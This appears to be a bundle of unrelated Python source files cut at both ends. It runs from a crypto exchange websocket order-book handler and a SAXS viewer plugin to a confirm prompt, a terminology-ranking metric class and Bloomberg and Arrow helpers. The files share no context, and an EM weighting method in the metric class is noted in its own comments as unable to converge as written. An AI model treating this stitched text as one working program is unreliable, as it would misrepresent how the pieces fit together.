                         pairs=pairs, channels=channels, callbacks=callbacks,
                         origin="https://exchange.blockchain.com",
                         **kwargs)
        self.__reset()

    def __reset(self):
        # Clear sequence tracking and cached books (called on [re]subscribe).
        self.seq_no = None
        self.l2_book = {}
        self.l3_book = {}

    async def _pair_l2_update(self, msg: str, timestamp: float):
        """Apply an L2 snapshot/update to the cached book and fire callbacks."""
        delta = {BID: [], ASK: []}
        pair = pair_exchange_to_std(msg['symbol'])
        forced = False
        if msg['event'] == 'snapshot':
            # Reset the book
            self.l2_book[pair] = {BID: sd(), ASK: sd()}
            forced = True
        book = self.l2_book[pair]
        for side in (BID, ASK):
            for update in msg[side + 's']:
                price = update['px']
                qty = update['qty']
                # qty <= 0 means the price level was removed from the book.
                book[side][price] = qty
                if qty <= 0:
                    del book[side][price]
                delta[side].append((price, qty))
        self.l2_book[pair] = book
        await self.book_callback(self.l2_book[pair], L2_BOOK, pair,
                                 forced, delta, timestamp_normalize(self.id, timestamp), timestamp)

    async def _handle_l2_msg(self, msg: str, timestamp: float):
        """
        Subscribed message
        {
          "seqnum": 1,
          "event": "subscribed",
          "channel": "l2",
          "symbol": "BTC-USD"
        }
        """
        if msg['event'] == 'subscribed':
            LOG.info(f"Subscribed to {msg['symbol']}")
        elif msg['event'] in ['snapshot', 'updated']:
            await self._pair_l2_update(msg, timestamp)
        else:
            LOG.warning("%s: Unexpected message %s", self.id, msg)

    async def _pair_l3_update(self, msg: str, timestamp: float):
        """Apply an L3 (per-order) snapshot/update to the cached book."""
        delta = {BID: [], ASK: []}
        pair = pair_exchange_to_std(msg['symbol'])
        if msg['event'] == 'snapshot':
            # Reset the book
            self.l3_book[pair] = {BID: sd(), ASK: sd()}
        book = self.l3_book[pair]
        for side in (BID, ASK):
            for update in msg[side + 's']:
                price = update['px']
                qty = update['qty']
                order_id = update['id']
                # Each price level holds a map of order_id -> qty.
                p_orders = book[side].get(price, sd())
                p_orders[order_id] = qty
                if qty <= 0:
                    del p_orders[order_id]
                book[side][price] = p_orders
                # Drop the price level entirely once its last order is gone.
                if len(book[side][price]) == 0:
                    del book[side][price]
                delta[side].append((order_id, price, qty))
        self.l3_book[pair] = book
        await self.book_callback(self.l3_book[pair], L3_BOOK, pair,
                                 False, delta, timestamp_normalize(self.id, timestamp), timestamp)

    async def _handle_l3_msg(self, msg: str, timestamp: float):
        if msg['event'] == 'subscribed':
            LOG.info(f"Subscribed to {msg['symbol']}")
        elif msg['event'] in ['snapshot', 'updated']:
            await self._pair_l3_update(msg, timestamp)
        else:
            LOG.warning("%s: Unexpected message %s", self.id, msg)

    async def _trade(self, msg: dict, timestamp: float):
        """
        trade msg example
        {
          "seqnum": 21,
          "event": "updated",
          "channel": "trades",
          "symbol": "BTC-USD",
          "timestamp": "2019-08-13T11:30:06.100140Z",
          "side": "sell",
          "qty": 8.5E-5,
          "price": 11252.4,
          "trade_id": "12884909920"
        }
        """
        await self.callback(TRADES, feed=self.id,
                            pair=msg['symbol'],
                            side=BUY if msg['side'] == 'buy' else SELL,
                            amount=msg['qty'],
                            price=msg['price'],
                            order_id=msg['trade_id'],
                            timestamp=timestamp_normalize(self.id, msg['timestamp']),
                            receipt_timestamp=timestamp)

    async def _handle_trade_msg(self, msg: str, timestamp: float):
        if msg['event'] == 'subscribed':
            LOG.info(f"Subscribed to trades for: {msg['symbol']}")
        elif msg['event'] == 'updated':
            await self._trade(msg, timestamp)
        else:
            LOG.warning("%s: Invalid message type %s", self.id, msg)

    async def message_handler(self, msg: str, timestamp: float):
        """Parse a raw websocket message, enforce ordering, and dispatch."""
        msg = json.loads(msg, parse_float=Decimal)
        # Every message carries a monotonically increasing sequence number;
        # a gap means we missed data and must restart.
        if self.seq_no is not None and msg['seqnum'] != self.seq_no + 1:
            raise ValueError("Incorrect sequence number. TODO: implement ws restart")
        self.seq_no = msg['seqnum']
        if 'channel' in msg:
            if msg['channel'] == 'l2':
                await self._handle_l2_msg(msg, timestamp)
            elif msg['channel'] == 'l3':
                await self._handle_l3_msg(msg, timestamp)
            elif msg['channel'] == 'trades':
                await self._handle_trade_msg(msg, timestamp)
        else:
            LOG.warning("%s: Invalid message type %s", self.id, msg)

    async def subscribe(self, websocket):
        self.__reset()
        # Subscribe either from an explicit config mapping or from the
        # cartesian product of configured pairs and channels.
        if self.config:
            for channel in self.config:
                for pair in self.config[channel]:
                    await websocket.send(json.dumps({"action": "subscribe",
                                                     "symbol": pair,
                                                     "channel": channel
                                                     }))
        else:
            for pair, channel in product(self.pairs, self.channels):
                await websocket.send(json.dumps({"action": "subscribe",
                                                 "symbol": pair,
                                                 "channel": channel
                                                 }))
|
from xicam.plugins import QWidgetPlugin
from pyqtgraph import ImageView, PlotItem
from xicam.core.data import NonDBHeader
from qtpy.QtWidgets import *
from qtpy.QtCore import *
from qtpy.QtGui import *
import numpy as np
from xicam.core import msg
from xicam.gui.widgets.tabview import TabView
from .SAXSViewerPlugin import SAXSViewerPluginBase
class SAXSMultiViewerPlugin(QSplitter, QWidgetPlugin):
    """Side-by-side (left/right) tab views for comparing SAXS data.

    Both tab views share the same header model; unknown attribute lookups
    are delegated to the left tab view.
    """

    def __init__(self, headermodel, selectionmodel):
        super(SAXSMultiViewerPlugin, self).__init__()
        self.leftTabView = TabView()
        self.leftTabView.setWidgetClass(SAXSViewerPluginBase)
        self.leftTabView.setHeaderModel(headermodel)
        self.leftTabView.setSelectionModel(selectionmodel)
        self.rightTabView = TabView()
        self.rightTabView.setWidgetClass(SAXSViewerPluginBase)
        self.rightTabView.setHeaderModel(headermodel)
        self.addWidget(self.leftTabView)
        self.addWidget(self.rightTabView)

    def __getattr__(self, attr):  ## implicitly wrap methods from the left view
        # Bug fix: this previously consulted `self.plotwidget` and
        # `self.leftViewer`, neither of which exists on this class —
        # `self.plotwidget` itself re-entered __getattr__, causing infinite
        # recursion. Delegate to the left tab view created in __init__.
        m = getattr(self.leftTabView, attr, None)
        if callable(m):
            return m
        # __getattr__ must raise AttributeError (not NameError) so that
        # hasattr() and friends behave correctly.
        raise AttributeError(attr)
|
from typing import Optional
from prompt_toolkit.styles import Style
from prompt_toolkit.buffer import Buffer
from prompt_toolkit.layout import Layout
from prompt_toolkit.lexers import SimpleLexer
from prompt_toolkit.application import get_app
from prompt_toolkit.enums import DEFAULT_BUFFER
from prompt_toolkit.validation import Validator
from prompt_toolkit.layout.controls import BufferControl
from prompt_toolkit.formatted_text import AnyFormattedText
from prompt_toolkit.layout.containers import HSplit, Window
from prompt_toolkit.key_binding import KeyBindings, KeyPressEvent
from . import NoAnswer, BasePrompt
class ConfirmPrompt(BasePrompt[bool]):
    """Simple Confirm Prompt.
    Style class guide:
    ```
    [?] Choose a choice and return? (Y/n)
    └┬┘ └──────────────┬──────────┘ └─┬─┘
    questionmark question annotation
    ```
    """

    def __init__(
        self,
        question: str,
        question_mark: str = "[?]",
        default_choice: Optional[bool] = None,
    ):
        # default_choice: True -> default yes, False -> default no,
        # None -> the user must answer explicitly.
        self.question: str = question
        self.question_mark: str = question_mark
        self.default_choice: Optional[bool] = default_choice

    def _reset(self):
        # Fresh answer state and input buffer for each prompt run.
        self._answered: bool = False
        self._buffer: Buffer = Buffer(
            validator=Validator.from_callable(self._validate),
            name=DEFAULT_BUFFER,
            accept_handler=self._submit,
        )

    def _build_layout(self) -> Layout:
        """Build a single-window layout whose line prefix renders the question."""
        self._reset()
        layout = Layout(
            HSplit(
                [
                    Window(
                        BufferControl(
                            self._buffer, lexer=SimpleLexer("class:answer")
                        ),
                        dont_extend_height=True,
                        get_line_prefix=self._get_prompt,
                    )
                ]
            )
        )
        return layout

    def _build_style(self, style: Style) -> Style:
        # Caller-supplied rules come last so they override the defaults.
        default = Style(
            [
                ("questionmark", "fg:#5F819D"),
                ("question", "bold"),
                ("answer", "fg:#5F819D"),
            ]
        )
        return Style([*default.style_rules, *style.style_rules])

    def _build_keybindings(self) -> KeyBindings:
        """Enter submits the answer; Ctrl-C / Ctrl-Q abort with NoAnswer."""
        kb = KeyBindings()

        @kb.add("enter", eager=True)
        def enter(event: KeyPressEvent):
            self._buffer.validate_and_handle()

        @kb.add("c-c", eager=True)
        @kb.add("c-q", eager=True)
        def quit(event: KeyPressEvent):
            event.app.exit(result=NoAnswer)

        return kb

    def _get_prompt(
        self, line_number: int, wrap_count: int
    ) -> AnyFormattedText:
        """Render the question plus a (Y/n)-style annotation until answered."""
        prompt = [
            ("class:questionmark", self.question_mark),
            ("", " "),
            ("class:question", self.question.strip()),
            ("", " "),
        ]
        if not self._answered:
            # Capitalize the side matching the default choice.
            if self.default_choice:
                prompt.append(("class:annotation", "(Y/n)"))
            elif self.default_choice == False:
                prompt.append(("class:annotation", "(y/N)"))
            else:
                prompt.append(("class:annotation", "(y/n)"))
            prompt.append(("", " "))
        return prompt

    def _validate(self, input: str) -> bool:
        # Empty input is only acceptable when a default choice exists;
        # otherwise the input must be one of y/yes/n/no (case-insensitive).
        if not input and self.default_choice is None:
            return False
        elif input and input.lower() not in ["y", "yes", "n", "no"]:
            return False
        return True

    def _submit(self, buffer: Buffer) -> bool:
        """Accept handler: translate the buffer text into a bool result."""
        self._answered = True
        input = buffer.document.text
        if not input:
            # NOTE(review): Document.insert_after returns a new Document and
            # does not mutate the buffer, so this line likely has no visible
            # effect -- confirm intended behavior.
            buffer.document.insert_after(str(self.default_choice))
            get_app().exit(result=self.default_choice)
        elif input.lower() in ["y", "yes"]:
            get_app().exit(result=True)
        else:
            get_app().exit(result=False)
        return True
|
# Names are dynamically typed: rebinding a name can change its type.
var1 = "2"
print(type(var1))  # <class 'str'>
var1 = 3
print(type(var1))  # <class 'int'>
##################
# Numeric types: int, float, complex.
var1 = 1
var2 = 2.0
var3 = 3.4 + 3j
##################
# Sequence types: str, list (mutable), tuple (immutable).
var4 = "Jamiryo"
var5 = [1, 1.0, "Jamiryo"]
var6 = (1, 1.0, "Jamiryo")
##################
# Mapping type: dict.
var7 = {"1": "Bir", "2": "İki"}
##################
# Set and boolean types.
var8 = set()
var9 = True
##################
# Reserved words cannot be used as identifiers.
import keyword
print(keyword.kwlist)
##################
#!/usr/bin/env python3
import math, nltk, logging, os
from Document import *
import TestData, Wordlist, Settings
import pickle
class Metric:
    """Metric contains all the functions necessary to score an RDG's terminology.

    An instance compares term statistics from a Related Document Group (RDG)
    against a general (background) collection and exposes a family of scoring
    metrics (DR, DC, DRDC, IDF, TF-IDF, token-adjusted variants, entropy,
    KL divergence, weighted combinations) plus ranking helpers.
    """

    def __init__(self, rdgDir, general, working_dir='.', overwrite=False,
                 rank_from_previous=False, background_cache_file='ranking.pkl',
                 full_to_abbr=False):
        """Load the background collection and the RDG.

        :param rdgDir: file listing the RDG document paths, one per line.
        :param general: either a path (str) to a file listing background
            documents one per line, or an nltk corpus-like object exposing
            ``words()``.
        :param working_dir: kept for interface compatibility (unused here).
        :param overwrite: passed through to Document to force re-parsing.
        :param rank_from_previous: if True, skip loading the background
            collection; scores come from the pickled cache instead.
        :param background_cache_file: path of the pickled score cache.
        :param full_to_abbr: kept for interface compatibility (unused here).
        """
        # The cache path is shared at module level so rankTerms() and
        # rankTermsFromPrevious() see the same file.
        global bck_cache_file
        bck_cache_file = background_cache_file
        # available metrics: metric name -> bound scoring method
        self.metrics = {'DR': self._calDR, 'DC': self._calDC,
                        'DRDC': self._calDRDC, 'IDF': self._calIDF,
                        'TFIDF': self._calTFIDF, 'TokenDRDC': self._calTokenDRDC,
                        'TokenIDF': self._calTokenIDF, 'Entropy': self._calEntropy,
                        'KLDiv': self._calKLDiv, 'Weighted': self._calWeighted,
                        'TF': self._calTF}
        # used for restoring a ranking from a previous run
        self.rankingmap = {}
        # aggregate counts over the whole background collection
        self.genDocs = Document(overwrite=overwrite)
        # number of background documents (needed for the true-IDF variant)
        self.genDocsNum = 0
        if rank_from_previous:
            # Scores will come from the cache; no background load needed.
            pass
        elif isinstance(general, str):
            # Background group given as a file listing documents.
            logging.debug('Loading general documents from ' + general)
            gen = map(lambda x: Document(filename=x.strip(), overwrite=overwrite),
                      open(general).readlines())
            # Only summed counts are needed for the background class, so the
            # per-document objects are consumed once and discarded.
            for doc in gen:
                self.genDocsNum += 1
                for w in doc.counts:
                    self.genDocs.counts[w] += doc.counts[w]
                    # token_counts records background document frequency here
                    self.genDocs.token_counts[w] += 1
        else:
            # Background group given as a corpus; store n-grams in lieu of NPs.
            logging.debug('Loading from general corpus...')
            words = general.words()
            logging.debug('Unigrams loading')
            bigrams = nltk.bigrams(words)
            logging.debug('Bigrams loading')
            trigrams = nltk.trigrams(words)
            logging.debug('Trigrams loading')
            filters = Settings.getCorpusFilters()
            logging.debug('Filtering unigrams')
            for w in words:
                for filt in filters:
                    w = Filter.criteria[filt](w)
                if w:
                    self.genDocs.counts[w] += 1
                    self.genDocs.token_counts[w] += 1
            logging.debug('Filtering bigrams')
            for gram in bigrams:
                w = ' '.join(gram)
                for filt in filters:
                    w = Filter.criteria[filt](w)
                if w:
                    self.genDocs.counts[w] += 1
            logging.debug('Filtering trigrams')
            for gram in trigrams:
                w = ' '.join(gram)
                for filt in filters:
                    w = Filter.criteria[filt](w)
                if w:
                    self.genDocs.counts[w] += 1
            logging.debug('done')
        # Related Document Group -- each document is kept separately.
        logging.debug('Loading RDG from ' + rdgDir + '...')
        # list() needed for Python 3: map() is a one-shot iterator.
        self.rdgDocs = list(map(lambda x: Document(filename=x.strip(),
                                                   overwrite=overwrite),
                                open(rdgDir).readlines()))
        logging.debug('done')

    def _getTermFreq(self, word):
        """Returns the (cached) total frequency of *word* in the rdgDocs."""
        if not hasattr(self, '_TermFreq'):
            self._TermFreq = {}
        if word in self._TermFreq:
            freq = self._TermFreq[word]
        else:
            freq = 0
            for doc in self.rdgDocs:
                if word in doc.counts:
                    freq += doc.counts[word]
            self._TermFreq[word] = freq
        return freq

    def _getTermDocFreq(self, word):
        """Returns the (cached) number of RDG documents containing *word*."""
        if not hasattr(self, '_TermDocFreq'):
            self._TermDocFreq = {}
        if word in self._TermDocFreq:
            freq = self._TermDocFreq[word]
        else:
            freq = 0
            for doc in self.rdgDocs:
                if word in doc.counts:
                    freq += 1
            self._TermDocFreq[word] = freq
        return freq

    def _calDR(self, word):
        """Returns the document relevance of a proposed term."""
        if not hasattr(self, '_DR'):
            self._DR = {}
        # restored-from-cache scores take precedence
        if (word, 'DR') in self.rankingmap:
            DR = self.rankingmap[(word, 'DR')]
        elif word in self._DR:
            DR = self._DR[word]
        else:
            posFreq = self._getTermFreq(word)
            negFreq = self.genDocs.counts[word] if word in self.genDocs.counts else 0
            if (negFreq + posFreq) != 0:
                # log(len+2) mildly rewards longer candidate strings
                DR = posFreq * math.log(len(word) + 2.0) / (negFreq + posFreq)
            else:
                DR = 0  # 0/0 treated as 0
            self._DR[word] = DR
        return DR

    def _calDC(self, word):
        """Returns the document consensus of a proposed term."""
        if not hasattr(self, '_DC'):
            self._DC = {}
        if (word, 'DC') in self.rankingmap:
            DC = self.rankingmap[(word, 'DC')]
        elif word in self._DC:
            DC = self._DC[word]
        else:
            posFreq = self._getTermFreq(word)
            DC = 0
            for doc in self.rdgDocs:
                if word in doc.counts:
                    if posFreq != 0:
                        # ptd = P(term | document); entropy-style consensus
                        ptd = doc.counts[word] / float(posFreq)
                        DC += ptd * math.log(1 / ptd)
                    else:
                        DC = 0  # 0/0 treated as 0
            self._DC[word] = DC
        return DC

    def _calDRDC(self, word):
        """Returns the document relevance-document consensus \
        (DRDC) of a proposed term."""
        if (word, 'DRDC') in self.rankingmap:
            return self.rankingmap[(word, 'DRDC')]
        else:
            return self._calDR(word) * self._calDC(word)

    def _calTrueIDF(self, word):
        """True IDF = log(numBackDocs / numBackDocs(t)), add-one smoothed
        so a zero document count cannot divide by zero."""
        return math.log((self.genDocsNum + 1) / (self.genDocs.token_counts[word] + 1))

    def _calIDF(self, word):
        """Returns the document relevance-inverse document frequency \
        (DR-IDF) of a proposed term."""
        if (word, 'IDF') in self.rankingmap:
            return self.rankingmap[(word, 'IDF')]
        else:
            # +3 keeps the log argument > 1 even for doc-freq 0
            return self._calDR(word) / math.log(self._getTermDocFreq(word) + 3.0)

    def _calTF(self, word):
        """Returns the raw term frequency of a proposed term (reference metric)."""
        return self._getTermFreq(word)

    def _calTFIDF(self, word):
        """Returns the term frequency-inverse document frequency (TF-IDF) \
        of a proposed term."""
        if not hasattr(self, '_TFIDF'):
            self._TFIDF = {}
        if word in self._TFIDF:
            TFIDF = self._TFIDF[word]
        else:
            # TF component: maximum count of the term in any single RDG doc
            maxFreq = max((doc.counts[word] for doc in self.rdgDocs
                           if word in doc.counts), default=0)
            TFIDF = self._calTrueIDF(word) * maxFreq
            self._TFIDF[word] = TFIDF
        return TFIDF

    def _calTokenDR(self, word):
        """Token frequency adjustment helper function."""
        if not hasattr(self, '_TokenDR'):
            self._TokenDR = {}
        if word in self._TokenDR:
            tokenDR = self._TokenDR[word]
        else:
            tokenDR = 0.0
            tokens = word.split()
            for t in tokens:
                if not t.isdigit():
                    # frequencies here are pure word counts, not NP counts
                    token_rel = 0.0
                    for doc in self.rdgDocs:
                        token_rel += doc.token_counts[t]
                    token_total = token_rel + self.genDocs.token_counts[t]
                    if token_total != 0:  # 0/0 treated as 0
                        tokenDR += token_rel / float(token_total)
            if len(tokens) == 0:
                tokenDR = 0  # prevent divide-by-zero on empty candidates
            else:
                tokenDR /= len(tokens)
            self._TokenDR[word] = tokenDR
        return tokenDR

    def _calTokenDRDC(self, word):
        """Returns DRDC of a proposed term, adjusted for token frequency."""
        if (word, 'TokenDRDC') in self.rankingmap:
            return self.rankingmap[(word, 'TokenDRDC')]
        else:
            return self._calDRDC(word) * self._calTokenDR(word)

    def _calTokenIDF(self, word):
        """Returns DR-IDF of a proposed term, adjusted for token frequency."""
        if (word, 'TokenIDF') in self.rankingmap:
            return self.rankingmap[(word, 'TokenIDF')]
        else:
            return self._calIDF(word) * self._calTokenDR(word)

    def _calEntropy(self, word):
        """Return the pseudo-entropy of a proposed term.

        -sum(p*log(p)) reduces (up to constants dropped here) to -sum(c*log(c));
        the sign is kept so that "most negative" is most important.
        """
        # +1 to avoid log(0)
        c = (self._getTermFreq(word) + 1)
        return -c * math.log(c)

    def _calKLDiv(self, word):
        """Return the pseudo-log relative entropy of a proposed term.

        sum(log(p/q)*p) reduces (up to constants dropped here) to
        sum((log(c1)-log(c2))*c1), where c1 is the RDG count and c2 the
        background count, both add-one smoothed to avoid log(0).
        """
        c1 = self._getTermFreq(word) + 1
        c2 = (self.genDocs.counts[word] + 1)
        return (math.log(c1) - math.log(c2)) * c1

    def _calSectionPrior(self, word):
        """NOT CURRENTLY SUPPORTED -- always returns a neutral prior of 1.0."""
        return 1.0

    def setWordlistProbs(self, probs):
        """Input dictionary of probabilities for terms in wordlists.
        Keys = 'patent', 'science', 'law', 'common', and 'medicine'."""
        self.lstProbs = probs.copy()

    def _calWordlistPrior(self, word):
        """Return a prior for *word* based on domain word-list membership.

        Legacy code, not wired into the standard metrics.
        """
        lstfolder = './wordlists/'
        lstfiles = [('patent', 'patents.lst'), ('science', 'academic.lst'),
                    ('law', 'idcourts.lst'), ('law', 'nycourts.lst'),
                    ('law', 'uscourts.lst'), ('common', 'gsl.lst'),
                    ('medicine', 'medical_roots.lst')]
        if not hasattr(self, 'lstProbs'):
            self.lstProbs = {'patent': 0.75, 'science': 0.25, 'law': 0.25,
                             'common': 0.01, 'medicine': 0.75}
        if not hasattr(self, 'wordlistdict'):
            # Load each list once, merging lists sharing a label (e.g. 'law'),
            # then compile them into match patterns.
            self.wordlistdict = {}
            for label, fname in lstfiles:
                lst = Wordlist.load(lstfolder + fname)
                if label in self.wordlistdict:
                    self.wordlistdict[label] += lst
                else:
                    self.wordlistdict[label] = lst
            for label in self.wordlistdict:
                self.wordlistdict[label] = Wordlist.compile_lst(self.wordlistdict[label])
        prior = 1.0
        for label in self.wordlistdict:
            for s in [word]:
                # fixed: previously referenced undefined names `w`/`lstProbs`
                matches = Wordlist.patternFind(self.wordlistdict[label], s, False)
                if matches:
                    prior *= self.lstProbs[label]
                    break
        return prior

    def setWeights(self, dictWeights):
        """Input dictionary of weights for weighted measurements.
        Keys = 'DC', 'DR', 'DRDC', 'TokenDRDC', 'IDF', 'TFIDF', 'TokenIDF', 'Entropy', 'KLDiv'."""
        self.weights = dictWeights.copy()

    def _calWeighted(self, word):
        """Returns the weighted score of a word over several different metrics."""
        ret = 0.0
        # fall back to configured defaults when setWeights() was never called
        if not hasattr(self, 'weights'):
            self.weights = Settings.getMetricWeights()
        for measure in self.weights:
            ret += self.weights[measure] * self.metrics[measure](word)
        return ret

    def rankTerms(self, measure='DRDC', save=True):
        """Score the RDG, return a list of (word, score) tuples, best first.

        :param measure: key into self.metrics selecting the scoring function.
        :param save: if True, record (word, measure) -> score pairs in the
            map pickled to the module-level cache file.
        """
        ranking = []
        ranking_map = {}  # cached separately so the returned list stays plain
        logging.debug('Entering rankTerms, loading keys...')
        words = set()
        for d in self.rdgDocs:
            words.update(d.counts.keys())
        logging.debug('Done')
        logging.debug('Measuring ranks...')
        for i, w in enumerate(words, start=1):
            if i % 1000 == 0:
                logging.debug('Measuring word ' + str(i))
            temp = self.metrics[measure](w)
            ranking.append((w, temp))
            if save:
                ranking_map[(w, measure)] = temp
        logging.debug('Done')
        logging.debug('Sorting...')
        ranking.sort(key=lambda x: x[1], reverse=True)
        # pickle needs a binary handle; `with` closes it deterministically
        # (the original leaked the file object)
        with open(bck_cache_file, 'wb') as f:
            pickle.dump(ranking_map, f)
        logging.debug('Done')
        return ranking

    def rankTermsFromPrevious(self, measure='DRDC'):
        """Score the RDG using the cached rankingmap; return (word, score) list."""
        with open(bck_cache_file, 'rb') as f:
            self.rankingmap = pickle.load(f)
        ranking = []  # local result list, distinct from the cache
        logging.debug('Entering rankTerms, loading keys...')
        words = set()
        for d in self.rdgDocs:
            words.update(d.counts.keys())
        logging.debug('Done')
        logging.debug('Measuring ranks...')
        for i, w in enumerate(words, start=1):
            if i % 1000 == 0:
                logging.debug('Measuring word ' + str(i))
            ranking.append((w, self.metrics[measure](w)))
        logging.debug('Sorting...')
        ranking.sort(key=lambda x: x[1], reverse=True)
        logging.debug('Done')
        return ranking

    def rankFile(self, filename, measure='DRDC', overwrite=False):
        """Score a single file rather than an entire RDG. NOT SUPPORTED!

        ``overwrite`` was previously an undefined name; it is now an explicit
        keyword argument (default False) passed through to Document.
        """
        ranking = []
        d = Document(filename=filename, overwrite=overwrite)
        for w in d.counts:
            ranking.append((w, self.metrics[measure](w)))
        ranking.sort(key=lambda x: x[1], reverse=True)
        return ranking

    def rankWordList(self, filename, measure='DRDC'):
        """Score a word list stored in a file (one word per line)."""
        # `with` closes the handle even if a metric raises
        with open(filename) as f:
            words = [line.strip() for line in f if line.strip() != '']
        ranking = [(w, self.metrics[measure](w)) for w in words]
        ranking.sort(key=lambda x: x[1], reverse=True)
        return ranking

    def scoreByRankSum(self, termfiles, measure='DRDC'):
        """Score a metric against a premade terminology list.

        Lower is better: each gold term contributes its position in the
        ranking, or len(ranking)+1 when absent.
        """
        terms = set()
        filters = ['case']
        for fname in termfiles:
            for w in TestData.load(fname):
                for filt in filters:
                    w = Filter.criteria[filt](w)
                if w:
                    terms.add(w)
        ranking = self.rankTerms(measure)
        score = 0
        for t in terms:
            # In Python 3, filter() returns a lazy, always-truthy iterator,
            # so the original `if r:` never took the miss branch (and r[0]
            # would raise).  Collect explicit hits instead.
            hits = [entry for entry in ranking if entry[0] == t]
            if hits:
                score += ranking.index(hits[0])
            else:
                score += len(ranking) + 1
        return score

    def scoreByTop(self, termfiles, measure='DRDC', n=300):
        """Count how many gold terms appear in the top *n* ranked terms."""
        terms = set()
        filters = ['case']
        for fname in termfiles:
            for w in TestData.load(fname):
                for filt in filters:
                    w = Filter.criteria[filt](w)
                if w:
                    terms.add(w)
        ranking = self.rankTerms(measure)
        top = ranking[:n]
        score = 0
        for t in terms:
            # filter() objects are always truthy in Python 3; use any().
            if any(entry[0] == t for entry in top):
                score += 1
        return score

    def _twiddleWeights(self, termfiles):
        """Use twiddle (0.1-step coordinate search) to find and return a
        dictionary of weights for use in weighted scoring. VERY slow."""
        self.weights = {'DR': 0.5, 'DC': 0.5, 'DRDC': 0.5, 'IDF': 0.5,
                        'TFIDF': 0.5, 'TokenDRDC': 0.5, 'TokenIDF': 0.5,
                        'Entropy': 0.5, 'KLDiv': 0.5}
        for i in range(100):
            for w in self.weights:
                print(w, 1)
                currweight = self.weights[w]
                currscore = self.scoreByRankSum(termfiles, measure='Weighted')
                print(w, 2)
                # try a step down; keep it if the (lower-is-better) score improves
                self.weights[w] = currweight - 0.1
                score = self.scoreByRankSum(termfiles, measure='Weighted')
                print(w, 3)
                if score < currscore:
                    continue
                print(w, 4)
                # try a step up
                self.weights[w] = currweight + 0.1
                score = self.scoreByRankSum(termfiles, measure='Weighted')
                print(w, 5)
                if score < currscore:
                    continue
                print(w, 6)
                # neither direction helped: restore the old weight
                self.weights[w] = currweight
                print(w, 7)
        print(self.weights)
        return self.weights

    def _EMWeights(self, testfolder, N=300):
        """Use EM to find and return a dictionary of metric weights by
        minimizing perplexity on a held-out set.

        E: c_i = (1/N) SUM_j(w_i*q_i(NP_j) / SUM_n(w_n*q_n(NP_j)))
        M: w_i = c_i / SUM_n(c_n)

        NOTE(review): the code that populates the held-out word list is
        commented out upstream, so ``self.testwords`` must be populated by
        the caller for this to converge.  (``self`` was previously missing
        from the signature, making the method uncallable.)
        """
        measures = ['TFIDF', 'IDF', 'TokenIDF', 'DRDC', 'TokenDRDC', 'KLDiv']
        # hypothesized probability distribution per measure
        print('Calculating probabilities...')
        Probs = {}
        for measure in measures:
            ranklist = self.rankTerms(measure)  # was: undefined name `metric`
            Probs[measure] = {}
            for item in ranklist:
                # scores are interpreted as log2 probabilities
                Probs[measure][item[0]] = 2 ** item[1]
                if Probs[measure][item[0]] == 0.0:
                    # was: raise('...'), which raises a TypeError instead
                    raise ValueError('Rounding Error! P = 0.0')
            print(measure + ' ')
        print('done')
        # import the test set
        print('Retrieving test set...')
        if not hasattr(self, 'testwords'):
            # mirrors the original (ineffective) loading behaviour; the
            # unstemming step that filled testwords remains disabled
            temp = [Document(filename=testfolder + f, overwrite=False)
                    for f in os.listdir(testfolder) if f[-4:] == '.txt']
            self.testwords = []
        print('done')
        # uniform initial weights
        weight = {measure: 1.0 / len(measures) for measure in measures}
        tolerance = 1e-10
        print('Optimizing weights...')
        delta = 1.0
        weight_old = weight.copy()
        while delta > tolerance:
            # E-step
            c = {}
            for j in weight:
                c[j] = 0.0
                # at most N held-out words
                N = min(N, len(self.testwords))
                for i in range(N):
                    NP = self.testwords[i]
                    if NP not in Probs[j]:
                        NP = '[UNK]'
                    numer = weight[j] * Probs[j][NP]
                    denom = 0.0
                    for n_measure in weight:
                        denom += weight[n_measure] * Probs[n_measure][NP]
                    c[j] += numer / denom
                c[j] *= (1.0 / N)
            # M-step
            delta = 0.0
            for j in weight:
                weight_old[j] = weight[j]
                weight[j] = c[j] / sum(c.values())
                delta += (weight[j] - weight_old[j]) ** 2
        print('done')
        self.setWeights(weight)  # was: undefined name `metric`
        return weight

    def findWeights(self, testfolder):
        """Public wrapper around the EM weight search."""
        # was: unqualified `_EMWeights(self, testfolder, 300)` -> NameError
        return self._EMWeights(testfolder, 300)
|
#!/usr/bin/env python
"""
Questions: Asks for further explanations regarding its parent. (common property)
"""
__all__ = ['patch', '__doc__']

def patch(target):
    """Append question-type configuration flags to a DBContent instance."""
    # NOTE(review): the original comment said entries come "in fixed order:
    # column <order_position>", yet the flag is set True -- confirm intent.
    target.is_in_random_order = True
    # Property ownership: this content type uses "given" properties only.
    target.COMMON_PROPERTY_CONTENT = False
    target.GIVEN_PROPERTY_CONTENT = True
    target.PRIVATE_PROPERTY_CONTENT = False
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 08 08:54:04 2014
@author: Brian Jacobowski <bjacobowski.dev@gmail.com>
"""
from blpapi.element import Element
from blpapi.schema import SchemaElementDefinition
def format_fld_name(fld_name):
    """Normalize a field name to Bloomberg's expected style:
    uppercase with underscores instead of spaces.

    Accepts plain strings, blpapi Element / SchemaElementDefinition
    objects (via their ``name()``), or anything convertible with str().
    """
    if isinstance(fld_name, str):
        raw = fld_name
    elif isinstance(fld_name, (Element, SchemaElementDefinition)):
        raw = str(fld_name.name())
    else:
        raw = str(fld_name)
    return raw.replace(' ', '_').upper()
def shape_list(list_in, shape):
    """Nest the flat list *list_in* into groups according to *shape*.

    Works from the innermost dimension outward: for each dimension d in
    reversed(shape), consecutive runs of d elements are grouped into lists.

    Bug fix: the original used ``map(list, zip(*args))`` which, in Python 3,
    returns a lazy ``map`` object instead of a list, so callers received an
    unmaterialized iterator.  Each level is now materialized eagerly.

    :param list_in: flat input sequence (not modified).
    :param shape: iterable of group sizes, applied innermost-last.
    :return: nested lists of the grouped elements.
    """
    rtn = list(list_in)
    for dim in reversed(shape):
        it = iter(rtn)
        # zip over `dim` references to the same iterator chunks consecutively
        rtn = [list(group) for group in zip(*([it] * dim))]
    return rtn
|
"""NdArray/Tensor array extension in Arrowbic.
"""
from typing import Iterable, Optional, Type, TypeVar
import numpy as np
import pyarrow as pa
from arrowbic.core.base_extension_array import BaseExtensionArray
from arrowbic.core.base_extension_type import BaseExtensionType
from arrowbic.core.base_types import NdArrayGeneric
from arrowbic.core.extension_type_registry import ExtensionTypeRegistry, find_registry_extension_type
TItem = TypeVar("TItem")
TArray = TypeVar("TArray", bound="TensorArray")
class TensorArray(BaseExtensionArray[NdArrayGeneric]):
    """NdArray/Tensor extension array.

    Storage layout: a struct array with two list fields -- ``data`` (the
